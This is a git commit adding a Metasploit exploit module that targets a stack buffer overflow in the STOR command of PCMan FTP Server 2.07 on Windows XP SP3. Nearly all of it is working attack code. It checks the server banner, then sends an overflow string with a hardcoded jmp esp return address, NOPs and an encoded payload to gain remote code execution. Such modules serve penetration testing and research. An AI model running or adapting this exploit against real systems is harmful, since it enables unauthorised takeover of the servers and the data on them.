added PCMan's FTP Server Crafted Multiple Command Handling Remote Buffer Overflow (OSVDB 94624)

2013-09-16 09:57:27 -07:00 · 2013-09-16 09:57:27 -07:00 · f657f4d145
parent e87f8a8ae6
commit f657f4d145
1 changed files with 77 additions and 0 deletions
--- a/modules/exploits/windows/ftp/pcman_stor_msf.rb
+++ b/modules/exploits/windows/ftp/pcman_stor_msf.rb
@ -0,0 +1,77 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
 #   http://metasploit.com/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
 	include Msf::Exploit::Remote::Ftp
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'PCMAN FTP Server STOR Command Stack Overflow',
 			'Description'    => %q{
 						This module exploits a buffer overflow vulnerability
 						found in the STOR command of the PCMAN FTP v2.07 Server
 						when the "/../" parameters are also sent to the server.
 			},
 			'Author'         => [
 						'Christian (Polunchis) Ramirez',	# Initial Discovery
 						'Rick (nanotechz9l) Flores',		# Metasploit Module                             
 					],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision: $',
 			'References'     =>
 				[
 					[ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
 		                 	[ 'OSVDB', '94624'],
 				],
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'process',
 				},
 			'Payload'        =>
 				{
 					'Space' 		=> 1000,
 					'BadChars' 		=> "\x00\xff\x0a\x0d\x20\x40",
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
 					[ 'Windows XP SP3', 
 						{ 
 							'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
 							'Offset' => 2002
 						} 
 					],
 				],
 			'DisclosureDate' => 'Jul 17 2011',
 			'DefaultTarget'	=> 0))
 	end
 	def check
 	connect
 	disconnect
 	if (banner =~ /220 PCMan's FTP Server 2.0/)
 		return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
 	end
 	def exploit
 		connect_login
 		print_status("Trying victim #{target.name}...")		
 		sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
 		sploit << make_nops(4)
 		sploit << payload.encoded
 		send_cmd( ['STOR', '/../' + sploit], false )
 		handler
 		disconnect
 	end
 end